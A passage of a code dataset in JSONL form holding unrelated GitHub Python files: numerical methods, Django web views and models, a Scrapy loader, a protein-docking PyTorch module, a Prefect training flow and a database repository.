qr(mat_a, 1.0e-15, 0.0, 51)\r\ntime1 = time.time() - start_time1\r\n\r\nprint('QR: iteration, time = ', iterative_times, time1)\r\nprint(' i eigenvalues ')\r\nfor i in range(dim):\r\n    print(f'{i:2d} {qr[i, i]:25.17e}')\r\n\r\n\r\n# -------------------------------------\r\n# Copyright (c) 2021 Tomonori Kouya\r\n# All rights reserved.\r\n# -------------------------------------\r\n","repo_name":"tkouya/inapy","sub_path":"chapter09/qr.py","file_name":"qr.py","file_ext":"py","file_size_in_byte":1648,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"21"} +{"seq_id":"187065602","text":"# -*- coding: utf-8 -*-\n\nfrom scrapy import Field, Item\nfrom scrapy.loader import ItemLoader\nfrom scrapy.loader.processors import MapCompose, TakeFirst\n\n\nclass GtrendsScraperItem(Item):\n    title = 
Field()\n    publisher = Field()\n    since_published = Field()\n    time_scraped = Field()\n    story = Field()\n    link = Field()\n\n\nclass GtrendsItemLoader(ItemLoader):\n    default_input_processor = MapCompose(unicode.strip)\n    default_output_processor = TakeFirst()\n    \n    time_scraped_in = MapCompose(\n        lambda x: unicode(x).strip()\n    )\n","repo_name":"ralphqq/trending_business_news_scraper","sub_path":"gtrends_scraper/items.py","file_name":"items.py","file_ext":"py","file_size_in_byte":546,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"4596704675","text":"# Dijkstra's algorithm\ngraph = {}\ngraph['start'] = {}\ngraph['start']['a'] = 6\ngraph['start']['b'] = 2\ngraph['a'] = {}\ngraph['a']['fin'] = 1\ngraph['b'] = {}\ngraph['b']['a'] = 3\ngraph['b']['fin'] = 5\ngraph['fin'] = {} # build the graph as a hash table\n\ninfinity = float('inf')\ncosts = {}\ncosts['a'] = 6\ncosts['b'] = 2\ncosts['fin'] = infinity # build the costs table\n\nparents = {}\nparents['a'] = 'start'\nparents['b'] = 'start'\nparents['fin'] = None # build the parents table\n\nprocessed = [] # nodes that have been processed\n\n\ndef find_lowest_cost_node(costs):\n    lowest_cost = float('inf')\n    lowest_cost_node = None\n\n    for node in costs: # iterate over all nodes\n        cost = costs[node]\n        if cost < lowest_cost and node not in processed: # lower cost and not yet processed\n            lowest_cost = cost # treat it as the lowest-cost node\n            lowest_cost_node = node\n\n    return lowest_cost_node\n\n\nnode = find_lowest_cost_node(costs)\nwhile node is not None:\n    cost = costs[node]\n    neighbors = graph[node]\n\n    for n in neighbors.keys():\n        new_cost = cost + neighbors[n]\n        if costs[n] > new_cost:\n            costs[n] = new_cost\n            parents[n] = node\n\n    processed.append(node)\n    node = find_lowest_cost_node(costs)\n\nprint(costs)\n\n\n\n\n","repo_name":"jszheng/PyChild","sub_path":"basic/python_Data_Structure/Dijkstra_algorithm.py","file_name":"Dijkstra_algorithm.py","file_ext":"py","file_size_in_byte":1239,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"25567242498","text":"from django.urls import path\n\nfrom Course_reg import views as Cviews\nfrom . 
import views as Uviews\n\nurlpatterns = [\n path('', Uviews.index, name='index'),\n path('login', Uviews.login_view, name='login'),\n path('logout', Uviews.logout_view, name='logout'),\n path('register', Uviews.register_view, name='register'),\n path('enrolled', Uviews.enrolled_view, name='enrolled'),\n path('enroll', Uviews.enroll, name='enroll'),\n path('del_enroll', Uviews.del_enroll, name='del_enroll'),\n path('../Course_reg', Cviews.course, name='course')\n]","repo_name":"6310682577/cn331_as2","sub_path":"Course_registrations/users/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":556,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"23842861215","text":"import uuid\nfrom django.db import models\n\n\n# Create your models here.\nclass ServiceType(models.Model):\n \"\"\"\n Class to save type of services\n Example:\n - Luz\n - Agua\n - Gas\n \"\"\"\n name = models.CharField(max_length=20)\n active = models.BooleanField(default=True)\n created_at = models.DateTimeField(null=True, auto_now_add=True)\n updated_at = models.DateTimeField(null=True, auto_now=True)\n\n def __str__(self):\n return self.name\n\n\nclass StatusPayable(models.Model):\n \"\"\"\n Class to save status of payable\n Example:\n - Paid\n - Pending\n - Rejected\n \"\"\"\n name = models.CharField(max_length=20)\n active = models.BooleanField(default=True)\n created_at = models.DateTimeField(null=True, auto_now_add=True)\n updated_at = models.DateTimeField(null=True, auto_now=True)\n\n def __str__(self):\n return self.name\n\n\nclass Payables(models.Model):\n \"\"\"\n Class to save payable record\n \"\"\"\n bar_code = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False)\n status = models.ForeignKey('payment_tax_service.StatusPayable', on_delete=models.CASCADE)\n type_service = models.ForeignKey('payment_tax_service.ServiceType', on_delete=models.CASCADE)\n description = models.TextField()\n importe = models.DecimalField(max_digits=10, decimal_places=2)\n due_date = models.DateField()\n created_at = models.DateTimeField(null=True, auto_now_add=True)\n updated_at = models.DateTimeField(null=True, auto_now=True)\n\n\nclass MethodTransaction(models.Model):\n \"\"\"\n Class to save the methods of payment transaction\n Example:\n - debit_card\n - credit_card\n - cash\n \"\"\"\n name = models.CharField(max_length=20)\n active = models.BooleanField(default=True)\n created_at = models.DateTimeField(null=True, auto_now_add=True)\n updated_at = models.DateTimeField(null=True, auto_now=True)\n\n def __str__(self):\n return self.name\n\n\nclass Transactions(models.Model):\n id = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False)\n method_transaction = models.ForeignKey('payment_tax_service.MethodTransaction', on_delete=models.CASCADE)\n payable = models.ForeignKey('payment_tax_service.Payables', on_delete=models.CASCADE)\n number_card = models.CharField(max_length=30, editable=False, null=True, blank=True)\n importe_pago = models.DecimalField(max_digits=10, decimal_places=2)\n description = models.TextField(null=True, blank=True)\n pay_date = models.DateField()\n created_at = models.DateTimeField(null=True, auto_now_add=True)\n updated_at = models.DateTimeField(null=True, 
auto_now=True)\n","repo_name":"fernandohernandezpaz/desafio_backend","sub_path":"payment_tax_service/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2700,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"24567966857","text":"import os\nfrom definitions import ROOT_DIR, PROFILE_FILES\nfrom log import logging\n\ndef mv_files(files_list=None):\n    if files_list is None:\n        files_list = PROFILE_FILES\n    for i in files_list:\n        old_path = os.path.join(ROOT_DIR, i)\n        new_path = os.path.join(ROOT_DIR, \"myopenaps\",\"settings\",i)\n        # print(\"Move:\")\n        # print(old_path)\n        # print(\"To:\")\n        # print(new_path)\n        os.replace(old_path, new_path)\n\ndef checkdir(dir):\n    if not os.path.isdir(dir):\n        logging.error(\"Directory not found\")\n        try:\n            os.makedirs(dir)\n        except Exception as e:\n            logging.error(\"Error occurred while creating directory:\"+dir)\n            logging.error(e)","repo_name":"KelvinKramp/Autotune123","sub_path":"file_management.py","file_name":"file_management.py","file_ext":"py","file_size_in_byte":723,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"10198320323","text":"import datetime\nimport os\nimport uuid\n\nfrom django.shortcuts import render\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.http import JsonResponse, HttpResponse, Http404\nfrom django.conf import settings\nfrom django.shortcuts import get_object_or_404\n\nfrom rest_framework.views import APIView\nfrom rest_framework.response import Response\nfrom rest_framework import status\n\nfrom accounts.models import UserModel\nfrom accounts.viewmodels import UserModelSerializer\nimport logging\n\nlogger = logging.getLogger(__name__)\n\n\n# Create your views here.\n\n\n@csrf_exempt\ndef fileupload(request):\n    if request.method == 'POST':\n        urls = []\n        for filename in request.FILES:\n            timestr = datetime.datetime.now().strftime('%Y/%m/%d')\n\n            basepath = r'{base}/image/{timestr}'.format(timestr=timestr, base='/var/www/resource/')\n\n            if not os.path.exists(basepath):\n                os.makedirs(basepath)\n            ext = os.path.splitext(filename)[1]\n            savefilename = str(uuid.uuid4()) + ext\n\n            savepath = os.path.join(basepath, savefilename)\n            with open(savepath, 'wb+') as wfile:\n                for chunk in request.FILES[filename].chunks():\n                    wfile.write(chunk)\n            if ext in ['.jpg', '.png', '.jpeg']: # splitext() keeps the leading dot, so '.jpeg' here\n                from PIL import Image\n                image = Image.open(savepath)\n                image.save(savepath, quality=20, optimize=True)\n            url = 'https://resource.lylinux.net/image/{timestr}/{filename}'.format(timestr=timestr, filename=savefilename)\n            urls.append(url)\n\n        return JsonResponse({\n            'code': 200,\n            'msg': '',\n            'data': urls\n        })\n\n    else:\n        return JsonResponse({\n            'code': 404,\n            'msg': 'only for post',\n            'data': ''\n        }, status=status.HTTP_404_NOT_FOUND)\n\n\ndef check_is_uuid():\n    def wrapper(func):\n        def check(*args, **kwargs):\n            id = kwargs.get('pk')\n            try:\n                id = uuid.UUID(id)\n                kwargs['pk'] = id\n            except:\n                raise Http404\n            return func(*args, **kwargs)\n\n        return check\n\n    return wrapper\n\n\nclass UserObjectApi(APIView):\n    def get_object(self, pk):\n        user = get_object_or_404(UserModel, id=pk)\n        return user\n\n    @check_is_uuid()\n    def get(self, request, pk, format=None):\n        logger.info(pk)\n        user = self.get_object(pk)\n        serializer = UserModelSerializer(user)\n        return Response(serializer.data)\n\n    @check_is_uuid()\n    def put(self, request, pk, format=None):\n        logger.info(pk)\n        user = self.get_object(pk)\n        serializer = 
UserModelSerializer(user, data=request.data)\n        if serializer.is_valid():\n            serializer.save()\n            return Response(serializer.data)\n        return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n    def post(self, request, format=None):\n        user = UserModelSerializer(data=request.data)\n        if user.is_valid():\n            user.save()\n            return Response(user.data, status=status.HTTP_201_CREATED)\n        return Response(user.errors, status=status.HTTP_400_BAD_REQUEST)\n","repo_name":"XiaoBiaoBai/xiaobiaobai.api","sub_path":"accounts/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3241,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"17516882190","text":"import sys\nsys.stdin = open('input.txt')\n\nT = int(input())\n\ndef check(card_list): # check for a run or a triplet\n    global rlt\n    cnt_list = [0] * 10 # count of each card value\n    for card in card_list:\n        cnt_list[card] += 1\n\n    if 3 in cnt_list: # triplet check (three identical cards)\n        rlt = 1\n        return\n\n    for i in range(8): # run check (three consecutive cards)\n        if cnt_list[i] != 0 and cnt_list[i]*cnt_list[i+1]*cnt_list[i+2] != 0: # the first count and the next two must all be nonzero\n            rlt = 1\n            return\n\nfor tc in range(1, T + 1):\n    arr = list(map(int, input().split()))\n    player1 = []\n    player2 = []\n    rlt = 0\n    for i in range(0, len(arr), 2): # step by 2, dealing one card to each player per turn\n        player1.append(arr[i])\n        player2.append(arr[i+1])\n        if i >= 4: # start checking once each player holds at least 3 cards\n            check(player1) # check player1 first\n            if rlt != 0: # a nonzero rlt means a run or triplet was found\n                rlt = 1\n                break\n            check(player2) # check player2\n            if rlt != 0:\n                rlt = 2\n                break\n\n    print(f'#{tc} {rlt}')","repo_name":"Sangtaek-Lee/Algorithm","sub_path":"problem/0329/5203/sol1.py","file_name":"sol1.py","file_ext":"py","file_size_in_byte":1286,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"23995752568","text":"import os\nimport multiprocessing\nfrom collections import OrderedDict\n\nimport numpy as np\nimport torch\nimport pytorch_lightning as pl\n\nfrom toil.job import Job\n\nfrom DataAugmenter import DataAugmenter, voxelize\nfrom molmimic.util.pdb import tidy\n#from molmimic.parsers.CNS import Minimize\n\ndef roll_n(X, axis, n):\n    \"\"\"https://github.com/tomrunia/PyTorchSteerablePyramid/blob/0b6514d81f669b52767689a5780c88087ea2c191/steerable/math_utils.py\"\"\"\n    f_idx = tuple(slice(None, None, None) if i != axis else slice(0, n, None) for i in range(X.dim()))\n    b_idx = tuple(slice(None, None, None) if i != axis else slice(n, None, None) for i in range(X.dim()))\n    front = X[f_idx]\n    back = X[b_idx]\n    return torch.cat([back, front], axis)\n\ndef batch_fftshift(x):\n    real, imag = torch.unbind(x, -1)\n    print(real.size(), imag.size())\n    for dim in range(1, len(real.size())):\n        n_shift = real.size(dim)//2\n        if real.size(dim) % 2 != 0:\n            n_shift += 1 # for odd-sized images\n        real = roll_n(real, axis=dim, n=n_shift)\n        imag = roll_n(imag, axis=dim, n=n_shift)\n    return torch.stack((real, imag), -1) # last dim=2 (real&imag)\n\ndef batch_ifftshift(x):\n    real, imag = torch.unbind(x, -1)\n    for dim in range(len(real.size()) - 1, 0, -1):\n        real = roll_n(real, axis=dim, n=real.size(dim)//2)\n        imag = roll_n(imag, axis=dim, n=imag.size(dim)//2)\n    return torch.stack((real, imag), -1) # last dim=2 (real&imag)\n\ndef normalize(v, eps=1e-6):\n    norm=np.linalg.norm(v, ord=1)\n    return v/norm if norm!=0 else v/eps\n\nclass DockPair(pl.LightningModule):\n\n    def __init__(self, receptor, ligand, hparams, rfft=True):\n        # init superclass\n        super(DockPair, self).__init__()\n        \n        self.hparams = hparams\n        \n        
self.rotation = None\n self.translation = None\n self.energy = None\n \n self.receptor = receptor\n self.ligand = ligand\n \n self.receptor_size = self.receptor.get_max_length(buffer=25)\n self.ligand_size = self.ligand.get_max_length(buffer=25)\n \n if self.ligand_size > self.receptor_size:\n #Resize receptor\n self.receptor.resize_volume(self.ligand_size)\n self.ligand.resize_volume(self.ligand_size)\n \n #Swap receptor and ligand so receptor is always largest\n ligand_ = self.ligand\n ligand_size_ = self.ligand_size\n self.ligand = self.receptor\n self.receptor = ligand_\n self.ligand_side = self.receptor_size\n self.receptor_size = ligand_size_\n else:\n #Resize ligand\n self.receptor.resize_volume(self.receptor_size)\n self.ligand.resize_volume(self.receptor_size)\n \n #Voxelize receptor\n self.receptor_volume = voxelize(self.receptor)\n \n self.rfft = rfft\n\n #Create Fourier image of receptor\n if rfft and self.receptor_volume.size()[-1] == 2:\n self.receptor_volume = self.receptor_volume[:, : , :, 0].resize(*self.receptor_volume.size()[:3])\n self.receptor_fft = torch.rfft(self.receptor_volume, 3).cpu()\n else:\n self.receptor_fft = torch.fft(self.receptor_volume, 3).cpu()\n \n #Take the complex conjugate of receptor\n self.receptor_fft = self.receptor_fft.conj()\n #self.receptor_fft[:,1] *= -1\n \n def get_complex(self):\n assert self.energy is not None\n \n def write(r, l, h, f):\n with open(f, \"w\") as complex_pdb:\n print(h, file=complex_pdb)\n for line in r:\n if not line.startswith(\"END\"):\n print(line.rstrip(), file=complex_pdb)\n for line in l:\n print(line.rstrip(), file=complex_pdb)\n \n #Rotate ligand to best orientation\n next(self.ligand.rotate(self.rotation))\n\n complex_file = \"{}_predicted_complex.pdb\".format(os.path.basename(self.receptor.path).split(\"_\")[0])\n \n receptor_pdb = self.receptor.save_pdb(file_like=True)\n ligand_pdb = self.ligand.save_pdb(file_like=True)\n \n write(receptor_pdb, ligand_pdb, \"\", complex_file+\".notrans.pdb\")\n\n #self.ligand.shift_coords(self.receptor\n self.ligand.shift_coords(self.translation, from_origin=False)\n\n header = \"REMARK Best Energy={}; Best Translation={}; \\n\".format(self.energy, self.translation)\n header += \"REMARK Best Rotation Matrix:\\n\"\n for line in str(self.rotation).splitlines():\n header += \"REMARK \"+line.rstrip()+\"\\n\"\n \n receptor_pdb = self.receptor.save_pdb(file_like=True)\n ligand_pdb = self.ligand.save_pdb(file_like=True)\n \n write(receptor_pdb, ligand_pdb, header, complex_file)\n \n self.ligand.shift_coords_to_volume_center()\n \n t2 = []\n for i in self.translation:\n if i>self.ligand.volume/2:\n t2.append(self.ligand.volume-i)\n else:\n t2.append(i)\n self.ligand.shift_coords(t2, from_origin=False)\n \n receptor_pdb = self.receptor.save_pdb(file_like=True)\n ligand_pdb = self.ligand.save_pdb(file_like=True)\n \n write(receptor_pdb, ligand_pdb, header, complex_file+\".shift.pdb\")\n \n self.ligand.shift_coords_to_volume_center()\n \n t2 = []\n for i in self.translation:\n t2.append(self.ligand.volume-i)\n self.ligand.shift_coords(t2, from_origin=False)\n \n receptor_pdb = self.receptor.save_pdb(file_like=True)\n ligand_pdb = self.ligand.save_pdb(file_like=True)\n \n write(receptor_pdb, ligand_pdb, header, complex_file+\".shift2.pdb\")\n \n self.ligand.shift_coords_to_volume_center()\n \n t2 = []\n for i in self.translation:\n t2.append(self.ligand.volume/2-i)\n self.ligand.shift_coords(t2, from_origin=False)\n \n receptor_pdb = self.receptor.save_pdb(file_like=True)\n ligand_pdb = 
self.ligand.save_pdb(file_like=True)\n \n write(receptor_pdb, ligand_pdb, header, complex_file+\".shift3.pdb\")\n \n self.ligand.shift_coords_to_volume_center()\n \n t2 = np.array(self.translation)-np.array([self.ligand.volume/2]*3)\n self.ligand.shift_coords(t2, from_origin=False)\n \n receptor_pdb = self.receptor.save_pdb(file_like=True)\n ligand_pdb = self.ligand.save_pdb(file_like=True)\n \n write(receptor_pdb, ligand_pdb, header, complex_file+\".shift4.pdb\")\n \n self.ligand.shift_coords_to_volume_center()\n \n self.ligand.shift_coords(self.translation, from_origin=True)\n \n receptor_pdb = self.receptor.save_pdb(file_like=True)\n ligand_pdb = self.ligand.save_pdb(file_like=True)\n \n write(receptor_pdb, ligand_pdb, header, complex_file+\".shift4.pdb\")\n \n \n #Minimize using CNS\n #complex_file, cns_results = Minimize(complex_file, work_dir=os.dirname(self.receptor.path), job=Job())\n\n print(list(self.receptor.structure.get_chains()), list(self.ligand.structure.get_chains()))\n\n def forward(self, rvs, ligand_volumes, shift=False):\n #Create Fourier image of ligand\n if self.rfft and ligand_volumes.size()[-1] == 2:\n ligand_volumes = ligand_volumes[:, :, : , :, 0].resize(*ligand_volumes.size()[:-1])\n ligand_fft = torch.rfft(ligand_volumes, 3)\n else:\n ligand_fft = torch.fft(ligand_volumes, 3)\n \n #Create Fourier image of rotated ligand\n #ligand_fft = torch.fft(ligand_volumes, 3)\n \n #Calculate energy using the convolution thm and correlation\n if self.rfft:\n energy = torch.irfft(self.receptor_fft.to(ligand_fft.device)*ligand_fft, 3)\n else:\n energy = torch.ifft(self.receptor_fft.to(ligand_fft.device)*ligand_fft, 3)\n \n if shift:\n energy = batch_ifftshift(energy)\n\n energy = energy[:, :, :, 0]\n \n print(energy)\n print(energy.size())\n\n #energy = energy.reshape(energy.size()[:-1])\n \n #Get index with lowest energy, \n maxval_z, ind_z = torch.max(energy, dim=3, keepdim=False)\n maxval_y, ind_y = torch.max(maxval_z, dim=2)\n maxval_x, ind_x = torch.max(maxval_y, dim=1)\n maxval_batch, ind_batch = torch.max(maxval_x, dim=0)\n \n #print(ind_x)\n \n batch = ind_batch.item()\n x = ind_x[batch].item()\n y = ind_y[batch, x].item()\n z = ind_z[batch, x, y].item()\n \n translation = (x, y, z)\n rotation = rvs[batch]\n low_energy = energy[batch, x, y, z]\n \n return translation, rotation, low_energy\n\n def training_step(self, batch, batch_num):\n rvs, volumes = batch\n translation, rotation, energy = self.forward(rvs, volumes)\n \n #return translation, rotation, energy\n \n if self.energy is None or energy>self.energy:\n self.rotation = rotation\n self.translation = translation\n self.energy = energy\n \n tqdm_dict = {'loss': energy.item(), 'energy': self.energy, \"translation\":translation}\n output = OrderedDict({\n 'loss': energy,\n 'progress_bar': tqdm_dict,\n 'log': {'loss': energy.item(), 'energy': self.energy}\n })\n return output\n \n def test_step(self, batch, batch_num):\n return self.training_step(batch, batch_num)\n \n def test_step_end(self, batch):\n print(batch)\n return batch\n \n def backward(self, closure_loss, optimizer, opt_idx):\n return\n \n def optimizer_step(self, current_epoch, batch_nb, optimizer, optimizer_i,\n second_order_closure=None):\n return\n\n# def training_end(self, batch):\n# print(batch)\n# print(batch[0][2])\n# translation, rotation, energy = min(batch, key=lambda b: b[2]) \n \n# if self.energy is None or energy= 1) & (df.duration <= 60)].copy()\n\n mean_duration = df.duration.mean()\n if train:\n logger.info(\"The mean duration of training 
is %f\", mean_duration)\n else:\n logger.info(\"The mean duration of validation is %f\", mean_duration)\n\n df[categorical] = df[categorical].fillna(-1).astype('int').astype('str')\n return df\n\n\n@prefect.task\ndef train_model(df, categorical):\n logger = prefect.get_run_logger()\n\n train_dicts = df[categorical].to_dict(orient='records')\n dv = DictVectorizer()\n X_train = dv.fit_transform(train_dicts)\n y_train = df.duration.values\n\n logger.info(f\"The shape of X_train is %s\", X_train.shape)\n logger.info(f\"The DictVectorizer has %d features\", len(dv.feature_names_))\n\n lr = LinearRegression()\n lr.fit(X_train, y_train)\n y_pred = lr.predict(X_train)\n mse = mean_squared_error(y_train, y_pred, squared=False)\n logger.info(f\"The MSE of training is: %f\", mse)\n return lr, dv\n\n\n@prefect.task\ndef run_model(df, categorical, dv, lr):\n logger = prefect.get_run_logger()\n\n val_dicts = df[categorical].to_dict(orient='records')\n X_val = dv.transform(val_dicts)\n y_pred = lr.predict(X_val)\n y_val = df.duration.values\n\n mse = mean_squared_error(y_val, y_pred, squared=False)\n logger.info(f\"The MSE of validation is: %f\", mse)\n return\n\n\ndef _string_to_date(date: str) -> datetime.date:\n return datetime.strptime(date, \"%Y-%m-%d\").date()\n\n\ndef _date_to_string(date: datetime.date) -> str:\n return date.strftime(\"%Y-%m\")\n\n\ndef _ensure_data_exists(path: Path):\n if path.exists():\n return\n\n response = requests.get(f\"https://nyc-tlc.s3.amazonaws.com/trip+data/{path.stem}.parquet\", verify=False)\n response.raise_for_status()\n\n with path.open(\"wb\") as file:\n file.write(response.content)\n\n\n@prefect.task\ndef get_paths(date: Optional[str] = None, date_folder: Path = Path(\"./data\")):\n logger = prefect.get_run_logger()\n\n if date is None:\n date = datetime.now().date()\n else:\n date = _string_to_date(date)\n\n train_date = date - relativedelta(months=2)\n val_date = date - relativedelta(months=1)\n\n train_path = date_folder / f\"fhv_tripdata_{_date_to_string(train_date)}.parquet\"\n val_path = date_folder / f\"fhv_tripdata_{_date_to_string(val_date)}.parquet\"\n\n logger.info(\"Train path %s\", train_path)\n logger.info(\"Val path %s\", val_path)\n\n _ensure_data_exists(train_path)\n _ensure_data_exists(val_path)\n\n return train_path, val_path\n\n\ndef _save_to_bin(obj: Any, path: Path):\n with path.open('wb') as file:\n pickle.dump(obj, file)\n\n\n@prefect.flow\ndef main(date: Optional[str] = None):\n train_path, val_path = get_paths(date).result()\n\n categorical = ['PUlocationID', 'DOlocationID']\n\n df_train = read_data(train_path)\n df_train_processed = prepare_features(df_train, categorical)\n\n df_val = read_data(val_path)\n df_val_processed = prepare_features(df_val, categorical, False)\n\n # train the model\n lr, dv = train_model(df_train_processed, categorical).result()\n run_model(df_val_processed, categorical, dv, lr)\n\n _save_to_bin(lr, Path(\"./artifacts\") / f\"model-{date}.bin\")\n _save_to_bin(dv, Path(\"./artifacts\") / f\"dv-{date}.bin\")\n\n\nDeploymentSpec(\n name=\"cron-schedule-deployment\",\n flow=main,\n schedule=CronSchedule(\n cron=\"0 9 15 * *\",\n ),\n flow_runner=SubprocessFlowRunner(),\n)\n\n\n# main(date=\"2021-08-15\")\n","repo_name":"LiableFish/mlops-zoomcamp","sub_path":"03-orchestration/homework.py","file_name":"homework.py","file_ext":"py","file_size_in_byte":4293,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"25250589323","text":"from abc import ABC, 
abstractmethod\nimport numpy\n\n\nclass UnstableClosedLoopSystemError(Exception):\n \"\"\"UnstableClosedLoopSystemError\n\n This error is raised if the computed K and L do not lead to a stable system (ie A-B@L or A - K@C have poles with positive real values).\n\n \"\"\"\n\n pass\n\n\nclass SOFCStepper(ABC):\n def __init__(\n self, A, B, H, Q, R, U, K, L, Ac=None, Bc=None, Hc=None, seed=None, **kwargs\n ):\n \"\"\"dx = (A @ x + B @ u)dt + Fx dnoise + Yu dnoise + G dnoise\n dy = H @ x*dt + D @ u*dt\n dxhat = (A_c @ xhat + B_c @ u)dt + K @ (dy - H_c @ xhat * dt)\n u = -L @ xhat\n\n costs: x.T @ Q @ x + u.T @ R @ u + (x-xhat).T @ U @ (x-xhat)\n\n \"\"\"\n\n self.x = None\n\n self.A = A\n self.B = B\n self.H = H\n self.Q = Q\n self.R = R\n self.U = U\n self.K = K\n self.L = L\n\n self.Ac = A if Ac is None else Ac\n self.Bc = B if Bc is None else Bc\n self.Hc = H if Hc is None else Hc\n\n self.rng = numpy.random.default_rng(seed=seed)\n\n def reset(self, timestep, simulation_time, x_init=None, n_trials=20):\n # initializes\n self.timestep = timestep\n self.simulation_time = simulation_time\n self.n_trials = n_trials\n TF = simulation_time # alias\n\n time = [-timestep] + numpy.arange(0, TF, timestep).tolist()\n self.time = time\n\n # Mov.shape = (#timesteps, #trials, state, x or xhat)\n Mov = numpy.zeros((len(time), n_trials, self.A.shape[0], 2))\n if x_init is None:\n x_init = numpy.zeros((self.A.shape[0],))\n x_init[0] = self.rng.random()\n Mov[0, :, :, 0] = x_init # initialize x\n Mov[0, :, :, 1] = x_init # initialize xhat\n self.Mov = Mov\n self.u = numpy.zeros((len(time) - 1, n_trials, self.B.shape[1]))\n self.cost = numpy.zeros((n_trials,))\n\n @abstractmethod\n def step(self, x, xhat, noise=True):\n pass\n\n def simulate(self, noise=True):\n for nt in range(self.n_trials):\n for i, t in enumerate(self.time[1:]):\n x, xhat = self.Mov[i, nt, :, 0].reshape(-1, 1), self.Mov[\n i, nt, :, 1\n ].reshape(-1, 1)\n step_result = self.step(x, xhat, noise=noise)\n dx, d_hat_x, u = (\n step_result[\"dx\"],\n step_result[\"dxhat\"],\n step_result[\"u\"],\n )\n self.Mov[i + 1, nt, :, 0] = (x + dx).reshape(1, -1)\n self.Mov[i + 1, nt, :, 1] = (xhat + d_hat_x).reshape(1, -1)\n self.u[i, nt, :] = u.squeeze()\n self.cost[nt] += step_result[\"cost\"]\n\n return self.Mov, self.u, self.cost\n","repo_name":"jgori-ouistiti/pointing_utils","sub_path":"pointing_utils/optimal_control/SOFCstepper.py","file_name":"SOFCstepper.py","file_ext":"py","file_size_in_byte":2769,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"29706953440","text":"from django.http import JsonResponse\nfrom django.shortcuts import render\n\n\ndef chart_list(request):\n return render(request, 'chart_list.html')\n\n\ndef chart_bar(request):\n legend = []\n x_axis = []\n series_list = []\n result = {\n 'status': True,\n \"data\": {\n 'legend': legend,\n \"series_list\": series_list,\n \"x_axis\": x_axis\n }\n }\n return JsonResponse(result)\n\n\ndef chart_pie(request):\n db_data_list = [{'value': 1048, 'name': 'IT部门'},\n {'value': 735, 'name': '运营部门'},\n {'value': 580, 'name': '新媒体部门'},\n {'value': 484, 'name': '广告部门'}, ]\n result = {\n 'status': True,\n \"data\": db_data_list\n }\n return JsonResponse(result)\n\n\ndef chart_line(request):\n x_axis = {\"data\": ['Mon', 'Tue', 'Wed', 'Thu', 'Fri', 'Sat', 'Sun']}\n\n series_list = {\"data\": [150, 230, 224, 218, 135, 147, 260]}\n result = {\n 'status': True,\n \"series_list\": series_list,\n \"x_axis\": x_axis\n }\n return 
JsonResponse(result)\n","repo_name":"benben555/djangoProject","sub_path":"exp1/webapp/views/chart.py","file_name":"chart.py","file_ext":"py","file_size_in_byte":1106,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"38703849430","text":"from typing import Optional\n\nfrom asyncpg import Connection\nfrom asyncpg import Record\n\nfrom app.core.config import get_app_settings\nfrom app.db.errors import EntityDoesNotExist\nfrom app.db.queries.queries import queries\nfrom app.db.repositories.base import BaseRepository\nfrom app.db.repositories.comments import CommentsRepository\nfrom app.db.repositories.users import UsersRepository\nfrom app.models.domain.posts import Post\nfrom app.models.domain.posts import PostWithComments\nfrom app.models.domain.posts import PostWithWalletAddress\nfrom app.models.schemas.posts import PostListResponse\n\nSETTINGS = get_app_settings()\n\n\nclass PostsRepository(BaseRepository):\n def __init__(self, conn: Connection) -> None:\n super().__init__(conn)\n self._users_repo = UsersRepository(conn)\n self._comments_repo = CommentsRepository(conn)\n\n async def get_post_by_id(self, *, id: int) -> PostWithWalletAddress:\n post_row = await queries.get_post_by_id(self.connection, id=id)\n\n if post_row:\n return await self._get_post_from_db_record(post_row=post_row)\n\n raise EntityDoesNotExist(f\"post with id {id} does not exist\")\n\n async def get_post_list(\n self,\n *,\n limit: int = 100,\n comments_limit: int = 3,\n offset: int = 0,\n store_id: Optional[int] = None,\n user_id: Optional[int] = None,\n is_public: Optional[bool] = None,\n ) -> PostListResponse:\n if store_id is not None:\n post_rows = await queries.get_posts_by_store_id(\n self.connection, limit=limit, offset=offset, store_id=store_id\n )\n elif is_public:\n post_rows = await queries.get_latest_posts(\n self.connection, limit=limit, offset=offset\n )\n else:\n post_rows = await queries.get_posts_by_user_id(\n self.connection, limit=limit, offset=offset, user_id=user_id\n )\n\n total = (\n await self._get_post_list_total_from_db_record(post_row=post_rows[0])\n if post_rows\n else 0\n )\n\n post_list = [\n await self._get_post_from_db_for_list_record(\n post_row=post_row, comments_limit=comments_limit\n )\n for post_row in post_rows\n ]\n\n return PostListResponse(posts=post_list, total=total)\n\n async def _get_post_from_db_record(self, *, post_row: Record) -> Post:\n user_id = post_row[\"user_id\"]\n user_info = (\n await self._users_repo.get_user_by_id(id=user_id)\n if user_id is not None\n else None\n )\n\n return Post(\n id_=post_row[\"id\"],\n store_id=post_row[\"store_id\"],\n user_id=user_id,\n user_wallet_address=user_info.wallet_address\n if user_info and user_info.wallet_address is not None\n else \"訪客\",\n user_image=user_info.image if user_info else None,\n body=post_row[\"body\"],\n image_url=post_row[\"image_url\"],\n rating=post_row[\"rating\"],\n status=post_row[\"status\"],\n created_at=post_row[\"created_at\"],\n 